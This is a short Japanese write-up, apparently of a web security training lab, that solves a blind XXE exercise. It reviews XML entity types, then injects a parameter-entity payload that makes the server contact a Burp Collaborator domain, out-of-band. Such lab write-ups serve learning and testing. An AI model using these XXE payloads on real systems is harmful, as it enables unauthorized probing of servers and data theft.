Hello there, ('ω')ノ

 

XMLパラメータエンティティを介した帯域外相互作用を伴うブラインドXXEを。

予期しない値は表示されず、外部エンティティをはブロックされるとのことで。

なので、パラメータエンティティを使用する必要があるらしく。

ここでエンティティのおさらいを。

 

例：

　内部エンティティ

　<!ENTITY xxe "hack">

　&xxe;

 

　外部エンティティ

　<!ENTITY xxe SYSTEM "http://www.example.com">

　&xxe;

 

　パラメータエンティティ（DTD内のみで参照）

　 <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://www.example.com"> %xxe; ]>

 

まずは、Check stockをクリックして。

 

 

xmlのリクエストをリピータへ。

 

 

コラボレータを起動して、ペイロードをコピーして。

 

 

コピーしたBurpCollaboratorサブドメインを挿入してパラメータエンティティを。

 

　<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://aesbba5kc6qdtk73wl35pwr55wbmzb.burpcollaborator.net"> %xxe; ]>

 

Poll nowで、ペイロードに起因するネットワーク相互作用の詳細を取得して。

ペイロードによって、攻撃者のドメインへのDNSルックアップと。

HTTPリクエストが発生して、攻撃が成功したことを確認して。

 

クリアできた。

 

 

Best regards, (^^ゞ